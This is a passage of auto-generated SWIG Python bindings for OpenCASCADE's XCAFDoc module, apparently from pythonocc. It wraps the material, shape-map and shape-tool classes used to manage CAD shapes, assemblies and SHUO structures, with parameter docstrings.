return _XCAFDoc.XCAFDoc_MaterialTool_GetMaterial(self, *args)
def GetDensityForShape(*args):
"""
* Find referred material and return density from it if no material --> return 0
:param ShapeL:
:type ShapeL: TDF_Label &
:rtype: float
"""
return _XCAFDoc.XCAFDoc_MaterialTool_GetDensityForShape(*args)
GetDensityForShape = staticmethod(GetDensityForShape)
def _kill_pointed(self):
"""_kill_pointed(XCAFDoc_MaterialTool self)"""
return _XCAFDoc.XCAFDoc_MaterialTool__kill_pointed(self)
def GetHandle(self):
"""GetHandle(XCAFDoc_MaterialTool self) -> Handle_XCAFDoc_MaterialTool"""
return _XCAFDoc.XCAFDoc_MaterialTool_GetHandle(self)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
XCAFDoc_MaterialTool.BaseLabel = new_instancemethod(_XCAFDoc.XCAFDoc_MaterialTool_BaseLabel,None,XCAFDoc_MaterialTool)
XCAFDoc_MaterialTool.ShapeTool = new_instancemethod(_XCAFDoc.XCAFDoc_MaterialTool_ShapeTool,None,XCAFDoc_MaterialTool)
XCAFDoc_MaterialTool.IsMaterial = new_instancemethod(_XCAFDoc.XCAFDoc_MaterialTool_IsMaterial,None,XCAFDoc_MaterialTool)
XCAFDoc_MaterialTool.GetMaterialLabels = new_instancemethod(_XCAFDoc.XCAFDoc_MaterialTool_GetMaterialLabels,None,XCAFDoc_MaterialTool)
XCAFDoc_MaterialTool.AddMaterial = new_instancemethod(_XCAFDoc.XCAFDoc_MaterialTool_AddMaterial,None,XCAFDoc_MaterialTool)
XCAFDoc_MaterialTool.SetMaterial = new_instancemethod(_XCAFDoc.XCAFDoc_MaterialTool_SetMaterial,None,XCAFDoc_MaterialTool)
XCAFDoc_MaterialTool.GetMaterial = new_instancemethod(_XCAFDoc.XCAFDoc_MaterialTool_GetMaterial,None,XCAFDoc_MaterialTool)
XCAFDoc_MaterialTool._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_MaterialTool__kill_pointed,None,XCAFDoc_MaterialTool)
XCAFDoc_MaterialTool.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_MaterialTool_GetHandle,None,XCAFDoc_MaterialTool)
XCAFDoc_MaterialTool_swigregister = _XCAFDoc.XCAFDoc_MaterialTool_swigregister
XCAFDoc_MaterialTool_swigregister(XCAFDoc_MaterialTool)
def XCAFDoc_MaterialTool_Set(*args):
"""
* Creates (if not exist) MaterialTool.
:param L:
:type L: TDF_Label &
:rtype: Handle_XCAFDoc_MaterialTool
"""
return _XCAFDoc.XCAFDoc_MaterialTool_Set(*args)
def XCAFDoc_MaterialTool_GetID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.XCAFDoc_MaterialTool_GetID(*args)
def XCAFDoc_MaterialTool_GetDensityForShape(*args):
"""
* Find referred material and return density from it if no material --> return 0
:param ShapeL:
:type ShapeL: TDF_Label &
:rtype: float
"""
return _XCAFDoc.XCAFDoc_MaterialTool_GetDensityForShape(*args)
class Handle_XCAFDoc_MaterialTool(OCC.TDF.Handle_TDF_Attribute):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
_XCAFDoc.Handle_XCAFDoc_MaterialTool_swiginit(self,_XCAFDoc.new_Handle_XCAFDoc_MaterialTool(*args))
DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_MaterialTool_DownCast)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
Handle_XCAFDoc_MaterialTool.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_MaterialTool_Nullify,None,Handle_XCAFDoc_MaterialTool)
Handle_XCAFDoc_MaterialTool.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_MaterialTool_IsNull,None,Handle_XCAFDoc_MaterialTool)
Handle_XCAFDoc_MaterialTool.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_MaterialTool_GetObject,None,Handle_XCAFDoc_MaterialTool)
Handle_XCAFDoc_MaterialTool._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_MaterialTool__kill_pointed,None,Handle_XCAFDoc_MaterialTool)
Handle_XCAFDoc_MaterialTool_swigregister = _XCAFDoc.Handle_XCAFDoc_MaterialTool_swigregister
Handle_XCAFDoc_MaterialTool_swigregister(Handle_XCAFDoc_MaterialTool)
def Handle_XCAFDoc_MaterialTool_DownCast(*args):
return _XCAFDoc.Handle_XCAFDoc_MaterialTool_DownCast(*args)
Handle_XCAFDoc_MaterialTool_DownCast = _XCAFDoc.Handle_XCAFDoc_MaterialTool_DownCast
class XCAFDoc_SequenceNodeOfGraphNodeSequence(OCC.TCollection.TCollection_SeqNode):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
"""
:param I:
:type I: Handle_XCAFDoc_GraphNode &
:param n:
:type n: TCollection_SeqNodePtr &
:param p:
:type p: TCollection_SeqNodePtr &
:rtype: None
"""
_XCAFDoc.XCAFDoc_SequenceNodeOfGraphNodeSequence_swiginit(self,_XCAFDoc.new_XCAFDoc_SequenceNodeOfGraphNodeSequence(*args))
def Value(self, *args):
"""
:rtype: Handle_XCAFDoc_GraphNode
"""
return _XCAFDoc.XCAFDoc_SequenceNodeOfGraphNodeSequence_Value(self, *args)
def _kill_pointed(self):
"""_kill_pointed(XCAFDoc_SequenceNodeOfGraphNodeSequence self)"""
return _XCAFDoc.XCAFDoc_SequenceNodeOfGraphNodeSequence__kill_pointed(self)
def GetHandle(self):
"""GetHandle(XCAFDoc_SequenceNodeOfGraphNodeSequence self) -> Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence"""
return _XCAFDoc.XCAFDoc_SequenceNodeOfGraphNodeSequence_GetHandle(self)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
XCAFDoc_SequenceNodeOfGraphNodeSequence.Value = new_instancemethod(_XCAFDoc.XCAFDoc_SequenceNodeOfGraphNodeSequence_Value,None,XCAFDoc_SequenceNodeOfGraphNodeSequence)
XCAFDoc_SequenceNodeOfGraphNodeSequence._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_SequenceNodeOfGraphNodeSequence__kill_pointed,None,XCAFDoc_SequenceNodeOfGraphNodeSequence)
XCAFDoc_SequenceNodeOfGraphNodeSequence.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_SequenceNodeOfGraphNodeSequence_GetHandle,None,XCAFDoc_SequenceNodeOfGraphNodeSequence)
XCAFDoc_SequenceNodeOfGraphNodeSequence_swigregister = _XCAFDoc.XCAFDoc_SequenceNodeOfGraphNodeSequence_swigregister
XCAFDoc_SequenceNodeOfGraphNodeSequence_swigregister(XCAFDoc_SequenceNodeOfGraphNodeSequence)
class Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence(OCC.TCollection.Handle_TCollection_SeqNode):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
_XCAFDoc.Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence_swiginit(self,_XCAFDoc.new_Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence(*args))
DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence_DownCast)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence_Nullify,None,Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence)
Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence_IsNull,None,Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence)
Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence_GetObject,None,Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence)
Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence__kill_pointed,None,Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence)
Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence_swigregister = _XCAFDoc.Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence_swigregister
Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence_swigregister(Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence)
def Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence_DownCast(*args):
return _XCAFDoc.Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence_DownCast(*args)
Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence_DownCast = _XCAFDoc.Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence_DownCast
class XCAFDoc_ShapeMapTool(OCC.TDF.TDF_Attribute):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def GetID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.XCAFDoc_ShapeMapTool_GetID(*args)
GetID = staticmethod(GetID)
def Set(*args):
"""
* Create (if not exist) ShapeTool from XCAFDoc on <L>.
:param L:
:type L: TDF_Label &
:rtype: Handle_XCAFDoc_ShapeMapTool
"""
return _XCAFDoc.XCAFDoc_ShapeMapTool_Set(*args)
Set = staticmethod(Set)
def __init__(self, *args):
"""
* Creates an empty tool
:rtype: None
"""
_XCAFDoc.XCAFDoc_ShapeMapTool_swiginit(self,_XCAFDoc.new_XCAFDoc_ShapeMapTool(*args))
def IsSubShape(self, *args):
"""
* Checks whether shape <sub> is subshape of shape stored on label shapeL
:param sub:
:type sub: TopoDS_Shape &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeMapTool_IsSubShape(self, *args)
def SetShape(self, *args):
"""
* Sets representation (TopoDS_Shape) for top-level shape
:param S:
:type S: TopoDS_Shape &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_ShapeMapTool_SetShape(self, *args)
def GetMap(self, *args):
"""
:rtype: TopTools_IndexedMapOfShape
"""
return _XCAFDoc.XCAFDoc_ShapeMapTool_GetMap(self, *args)
def _kill_pointed(self):
"""_kill_pointed(XCAFDoc_ShapeMapTool self)"""
return _XCAFDoc.XCAFDoc_ShapeMapTool__kill_pointed(self)
def GetHandle(self):
"""GetHandle(XCAFDoc_ShapeMapTool self) -> Handle_XCAFDoc_ShapeMapTool"""
return _XCAFDoc.XCAFDoc_ShapeMapTool_GetHandle(self)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
XCAFDoc_ShapeMapTool.IsSubShape = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeMapTool_IsSubShape,None,XCAFDoc_ShapeMapTool)
XCAFDoc_ShapeMapTool.SetShape = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeMapTool_SetShape,None,XCAFDoc_ShapeMapTool)
XCAFDoc_ShapeMapTool.GetMap = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeMapTool_GetMap,None,XCAFDoc_ShapeMapTool)
XCAFDoc_ShapeMapTool._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeMapTool__kill_pointed,None,XCAFDoc_ShapeMapTool)
XCAFDoc_ShapeMapTool.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeMapTool_GetHandle,None,XCAFDoc_ShapeMapTool)
XCAFDoc_ShapeMapTool_swigregister = _XCAFDoc.XCAFDoc_ShapeMapTool_swigregister
XCAFDoc_ShapeMapTool_swigregister(XCAFDoc_ShapeMapTool)
def XCAFDoc_ShapeMapTool_GetID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.XCAFDoc_ShapeMapTool_GetID(*args)
def XCAFDoc_ShapeMapTool_Set(*args):
"""
* Create (if not exist) ShapeTool from XCAFDoc on <L>.
:param L:
:type L: TDF_Label &
:rtype: Handle_XCAFDoc_ShapeMapTool
"""
return _XCAFDoc.XCAFDoc_ShapeMapTool_Set(*args)
class Handle_XCAFDoc_ShapeMapTool(OCC.TDF.Handle_TDF_Attribute):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
_XCAFDoc.Handle_XCAFDoc_ShapeMapTool_swiginit(self,_XCAFDoc.new_Handle_XCAFDoc_ShapeMapTool(*args))
DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_ShapeMapTool_DownCast)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
Handle_XCAFDoc_ShapeMapTool.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_ShapeMapTool_Nullify,None,Handle_XCAFDoc_ShapeMapTool)
Handle_XCAFDoc_ShapeMapTool.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_ShapeMapTool_IsNull,None,Handle_XCAFDoc_ShapeMapTool)
Handle_XCAFDoc_ShapeMapTool.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_ShapeMapTool_GetObject,None,Handle_XCAFDoc_ShapeMapTool)
Handle_XCAFDoc_ShapeMapTool._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_ShapeMapTool__kill_pointed,None,Handle_XCAFDoc_ShapeMapTool)
Handle_XCAFDoc_ShapeMapTool_swigregister = _XCAFDoc.Handle_XCAFDoc_ShapeMapTool_swigregister
Handle_XCAFDoc_ShapeMapTool_swigregister(Handle_XCAFDoc_ShapeMapTool)
def Handle_XCAFDoc_ShapeMapTool_DownCast(*args):
return _XCAFDoc.Handle_XCAFDoc_ShapeMapTool_DownCast(*args)
Handle_XCAFDoc_ShapeMapTool_DownCast = _XCAFDoc.Handle_XCAFDoc_ShapeMapTool_DownCast
class XCAFDoc_ShapeTool(OCC.TDF.TDF_Attribute):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def GetID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetID(*args)
GetID = staticmethod(GetID)
def Set(*args):
"""
* Create (if not exist) ShapeTool from XCAFDoc on <L>.
:param L:
:type L: TDF_Label &
:rtype: Handle_XCAFDoc_ShapeTool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_Set(*args)
Set = staticmethod(Set)
def __init__(self, *args):
"""
* Creates an empty tool Creates a tool to work with a document <Doc> Attaches to label XCAFDoc::LabelShapes()
:rtype: None
"""
_XCAFDoc.XCAFDoc_ShapeTool_swiginit(self,_XCAFDoc.new_XCAFDoc_ShapeTool(*args))
def IsTopLevel(self, *args):
"""
* Returns True if the label is a label of top-level shape, as opposed to component of assembly or subshape
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsTopLevel(self, *args)
def IsFree(*args):
"""
* Returns True if the label is not used by any assembly, i.e. contains sublabels which are assembly components This is relevant only if IsShape() is True (There is no Father TreeNode on this <L>)
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsFree(*args)
IsFree = staticmethod(IsFree)
def IsShape(*args):
"""
* Returns True if the label represents a shape (simple shape, assembly or reference)
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsShape(*args)
IsShape = staticmethod(IsShape)
def IsSimpleShape(*args):
"""
* Returns True if the label is a label of simple shape
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsSimpleShape(*args)
IsSimpleShape = staticmethod(IsSimpleShape)
def IsReference(*args):
"""
* Return true if <L> is a located instance of other shape i.e. reference
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsReference(*args)
IsReference = staticmethod(IsReference)
def IsAssembly(*args):
"""
* Returns True if the label is a label of assembly, i.e. contains sublabels which are assembly components This is relevant only if IsShape() is True
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsAssembly(*args)
IsAssembly = staticmethod(IsAssembly)
def IsComponent(*args):
"""
* Return true if <L> is reference serving as component of assembly
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsComponent(*args)
IsComponent = staticmethod(IsComponent)
def IsCompound(*args):
"""
* Returns True if the label is a label of compound, i.e. contains some sublabels This is relevant only if IsShape() is True
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsCompound(*args)
IsCompound = staticmethod(IsCompound)
def IsSubShape(self, *args):
"""
* Return true if <L> is subshape of the top-level shape
:param L:
:type L: TDF_Label &
:rtype: bool
* Checks whether shape <sub> is subshape of shape stored on label shapeL
:param shapeL:
:type shapeL: TDF_Label &
:param sub:
:type sub: TopoDS_Shape &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsSubShape(self, *args)
def SearchUsingMap(self, *args):
"""
:param S:
:type S: TopoDS_Shape &
:param L:
:type L: TDF_Label &
:param findWithoutLoc:
:type findWithoutLoc: bool
:param findSubshape:
:type findSubshape: bool
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_SearchUsingMap(self, *args)
def Search(self, *args):
"""
* General tool to find a (sub) shape in the document * If findInstance is True, and S has a non-null location, first tries to find the shape among the top-level shapes with this location * If not found, and findComponent is True, tries to find the shape among the components of assemblies * If not found, tries to find the shape without location among top-level shapes * If not found and findSubshape is True, tries to find a shape as a subshape of top-level simple shapes Returns False if nothing is found
:param S:
:type S: TopoDS_Shape &
:param L:
:type L: TDF_Label &
:param findInstance: default value is Standard_True
:type findInstance: bool
:param findComponent: default value is Standard_True
:type findComponent: bool
:param findSubshape: default value is Standard_True
:type findSubshape: bool
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_Search(self, *args)
def FindShape(self, *args):
"""
* Returns the label corresponding to shape S (searches among top-level shapes, not including subcomponents of assemblies) If findInstance is False (default), searches for the non-located shape (i.e. among original shapes) If findInstance is True, searches for the shape with the same location, including shape instances Return True if <S> is found.
:param S:
:type S: TopoDS_Shape &
:param L:
:type L: TDF_Label &
:param findInstance: default value is Standard_False
:type findInstance: bool
:rtype: bool
* Does the same as previous method Returns Null label if not found
:param S:
:type S: TopoDS_Shape &
:param findInstance: default value is Standard_False
:type findInstance: bool
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_ShapeTool_FindShape(self, *args)
def GetShape(*args):
"""
* To get TopoDS_Shape from shape's label For component, returns new shape with correct location Returns False if label does not contain shape
:param L:
:type L: TDF_Label &
:param S:
:type S: TopoDS_Shape &
:rtype: bool
* To get TopoDS_Shape from shape's label For component, returns new shape with correct location Returns Null shape if label does not contain shape
:param L:
:type L: TDF_Label &
:rtype: TopoDS_Shape
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetShape(*args)
GetShape = staticmethod(GetShape)
def NewShape(self, *args):
"""
* Creates new (empty) top-level shape. Initially it holds empty TopoDS_Compound
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_ShapeTool_NewShape(self, *args)
def SetShape(self, *args):
"""
* Sets representation (TopoDS_Shape) for top-level shape
:param L:
:type L: TDF_Label &
:param S:
:type S: TopoDS_Shape &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_ShapeTool_SetShape(self, *args)
def AddShape(self, *args):
"""
* Adds a new top-level (creates and returns a new label) If makeAssembly is True, treats TopAbs_COMPOUND shapes as assemblies (creates assembly structure). NOTE: <makePrepare> replace components without location in assmebly by located components to avoid some problems. If AutoNaming() is True then automatically attaches names.
:param S:
:type S: TopoDS_Shape &
:param makeAssembly: default value is Standard_True
:type makeAssembly: bool
:param makePrepare: default value is Standard_True
:type makePrepare: bool
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_ShapeTool_AddShape(self, *args)
def RemoveShape(self, *args):
"""
* Removes shape (whole label and all its sublabels) If removeCompletely is true, removes complete shape If removeCompletely is false, removes instance(location) only Returns False (and does nothing) if shape is not free or is not top-level shape
:param L:
:type L: TDF_Label &
:param removeCompletely: default value is Standard_True
:type removeCompletely: bool
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_RemoveShape(self, *args)
def Init(self, *args):
"""
* set hasComponents into false
:rtype: None
"""
return _XCAFDoc.XCAFDoc_ShapeTool_Init(self, *args)
def SetAutoNaming(*args):
"""
* Sets auto-naming mode to <V>. If True then for added shapes, links, assemblies and SHUO's, the TDataStd_Name attribute is automatically added. For shapes it contains a shape type (e.g. 'SOLID', 'SHELL', etc); for links it has a form '=>[0:1:1:2]' (where a tag is a label containing a shape without a location); for assemblies it is 'ASSEMBLY', and 'SHUO' for SHUO's. This setting is global; it cannot be made a member function as it is used by static methods as well. By default, auto-naming is enabled. See also AutoNaming().
:param V:
:type V: bool
:rtype: void
"""
return _XCAFDoc.XCAFDoc_ShapeTool_SetAutoNaming(*args)
SetAutoNaming = staticmethod(SetAutoNaming)
def AutoNaming(*args):
"""
* Returns current auto-naming mode. See SetAutoNaming() for description.
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_AutoNaming(*args)
AutoNaming = staticmethod(AutoNaming)
def ComputeShapes(self, *args):
"""
* recursive
:param L:
:type L: TDF_Label &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_ShapeTool_ComputeShapes(self, *args)
def ComputeSimpleShapes(self, *args):
"""
* Compute a sequence of simple shapes
:rtype: None
"""
return _XCAFDoc.XCAFDoc_ShapeTool_ComputeSimpleShapes(self, *args)
def GetShapes(self, *args):
"""
* Returns a sequence of all top-level shapes
:param Labels:
:type Labels: TDF_LabelSequence &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetShapes(self, *args)
def GetFreeShapes(self, *args):
"""
* Returns a sequence of all top-level shapes which are free (i.e. not referred by any other)
:param FreeLabels:
:type FreeLabels: TDF_LabelSequence &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetFreeShapes(self, *args)
def GetUsers(*args):
"""
* Returns list of labels which refer shape L as component Returns number of users (0 if shape is free)
:param L:
:type L: TDF_Label &
:param Labels:
:type Labels: TDF_LabelSequence &
:param getsubchilds: default value is Standard_False
:type getsubchilds: bool
:rtype: int
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetUsers(*args)
GetUsers = staticmethod(GetUsers)
def GetLocation(*args):
"""
* Returns location of instance
:param L:
:type L: TDF_Label &
:rtype: TopLoc_Location
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetLocation(*args)
GetLocation = staticmethod(GetLocation)
def GetReferredShape(*args):
"""
* Returns label which corresponds to a shape referred by L Returns False if label is not reference
:param L:
:type L: TDF_Label &
:param Label:
:type Label: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetReferredShape(*args)
GetReferredShape = staticmethod(GetReferredShape)
def NbComponents(*args):
"""
* Returns number of Assembles components
:param L:
:type L: TDF_Label &
:param getsubchilds: default value is Standard_False
:type getsubchilds: bool
:rtype: int
"""
return _XCAFDoc.XCAFDoc_ShapeTool_NbComponents(*args)
NbComponents = staticmethod(NbComponents)
def GetComponents(*args):
"""
* Returns list of components of assembly Returns False if label is not assembly
:param L:
:type L: TDF_Label &
:param Labels:
:type Labels: TDF_LabelSequence &
:param getsubchilds: default value is Standard_False
:type getsubchilds: bool
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetComponents(*args)
GetComponents = staticmethod(GetComponents)
def AddComponent(self, *args):
"""
* Adds a component given by its label and location to the assembly Note: assembly must be IsAssembly() or IsSimpleShape()
:param assembly:
:type assembly: TDF_Label &
:param comp:
:type comp: TDF_Label &
:param Loc:
:type Loc: TopLoc_Location &
:rtype: TDF_Label
* Adds a shape (located) as a component to the assembly If necessary, creates an additional top-level shape for component and return the Label of component. If expand is True and component is Compound, it will be created as assembly also Note: assembly must be IsAssembly() or IsSimpleShape()
:param assembly:
:type assembly: TDF_Label &
:param comp:
:type comp: TopoDS_Shape &
:param expand: default value is Standard_False
:type expand: bool
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_ShapeTool_AddComponent(self, *args)
def RemoveComponent(self, *args):
"""
* Removes a component from its assembly
:param comp:
:type comp: TDF_Label &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_ShapeTool_RemoveComponent(self, *args)
def UpdateAssembly(self, *args):
"""
* Update an assembly at label <L>
:param L:
:type L: TDF_Label &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_ShapeTool_UpdateAssembly(self, *args)
def FindSubShape(self, *args):
"""
* Finds a label for subshape <sub> of shape stored on label shapeL Returns Null label if it is not found
:param shapeL:
:type shapeL: TDF_Label &
:param sub:
:type sub: TopoDS_Shape &
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_FindSubShape(self, *args)
def AddSubShape(self, *args):
"""
* Adds a label for subshape <sub> of shape stored on label shapeL Returns Null label if it is not subshape
:param shapeL:
:type shapeL: TDF_Label &
:param sub:
:type sub: TopoDS_Shape &
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_ShapeTool_AddSubShape(self, *args)
def FindMainShapeUsingMap(self, *args):
"""
:param sub:
:type sub: TopoDS_Shape &
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_ShapeTool_FindMainShapeUsingMap(self, *args)
def FindMainShape(self, *args):
"""
* Performs a search among top-level shapes to find the shape containing <sub> as subshape Checks only simple shapes, and returns the first found label (which should be the only one for valid model)
:param sub:
:type sub: TopoDS_Shape &
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_ShapeTool_FindMainShape(self, *args)
def GetSubShapes(*args):
"""
* Returns list of labels identifying subshapes of the given shape Returns False if no subshapes are placed on that label
:param L:
:type L: TDF_Label &
:param Labels:
:type Labels: TDF_LabelSequence &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetSubShapes(*args)
GetSubShapes = staticmethod(GetSubShapes)
def BaseLabel(self, *args):
"""
* returns the label under which shapes are stored
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_ShapeTool_BaseLabel(self, *args)
def Dump(self, *args):
"""
:param deep: default value is Standard_False
:type deep: bool
:rtype: None
"""
return _XCAFDoc.XCAFDoc_ShapeTool_Dump(self, *args)
def DumpShape(*args):
"""
* Print in cout type of shape found on <L> label and the entry of <L>, with <level> tabs before. If <deep>, print also TShape and Location addresses
:param L:
:type L: TDF_Label &
:param level: default value is 0
:type level: int
:param deep: default value is Standard_False
:type deep: bool
:rtype: void
"""
return _XCAFDoc.XCAFDoc_ShapeTool_DumpShape(*args)
DumpShape = staticmethod(DumpShape)
def IsExternRef(*args):
"""
* Returns True if the label is a label of external references, i.e. there are some reference on the no-step files, which are described in document only their names
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsExternRef(*args)
IsExternRef = staticmethod(IsExternRef)
def SetExternRefs(self, *args):
"""
* Sets the names of references on the no-step files
:param SHAS:
:type SHAS: TColStd_SequenceOfHAsciiString &
:rtype: TDF_Label
* Sets the names of references on the no-step files
:param L:
:type L: TDF_Label &
:param SHAS:
:type SHAS: TColStd_SequenceOfHAsciiString &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_ShapeTool_SetExternRefs(self, *args)
def GetExternRefs(*args):
"""
* Gets the names of references on the no-step files
:param L:
:type L: TDF_Label &
:param SHAS:
:type SHAS: TColStd_SequenceOfHAsciiString &
:rtype: void
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetExternRefs(*args)
GetExternRefs = staticmethod(GetExternRefs)
def SetSHUO(self, *args):
"""
* Sets the SHUO structure between upper_usage and next_usage create multy-level (if number of labels > 2) SHUO from first to last Initialise out <MainSHUOAttr> by main upper_usage SHUO attribute. Returns False if some of labels in not component label
:param Labels:
:type Labels: TDF_LabelSequence &
:param MainSHUOAttr:
:type MainSHUOAttr: Handle_XCAFDoc_GraphNode &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_SetSHUO(self, *args)
def GetSHUO(*args):
"""
* Returns founded SHUO GraphNode attribute <aSHUOAttr> Returns false in other case
:param SHUOLabel:
:type SHUOLabel: TDF_Label &
:param aSHUOAttr:
:type aSHUOAttr: Handle_XCAFDoc_GraphNode &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetSHUO(*args)
GetSHUO = staticmethod(GetSHUO)
def GetAllComponentSHUO(*args):
"""
* Returns founded SHUO GraphNodes of indicated component Returns false in other case
:param CompLabel:
:type CompLabel: TDF_Label &
:param SHUOAttrs:
:type SHUOAttrs: TDF_AttributeSequence &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetAllComponentSHUO(*args)
GetAllComponentSHUO = staticmethod(GetAllComponentSHUO)
def GetSHUOUpperUsage(*args):
"""
* Returns the sequence of labels of SHUO attributes, which is upper_usage for this next_usage SHUO attribute (that indicated by label) NOTE: returns upper_usages only on one level (not recurse) NOTE: do not clear the sequence before filling
:param NextUsageL:
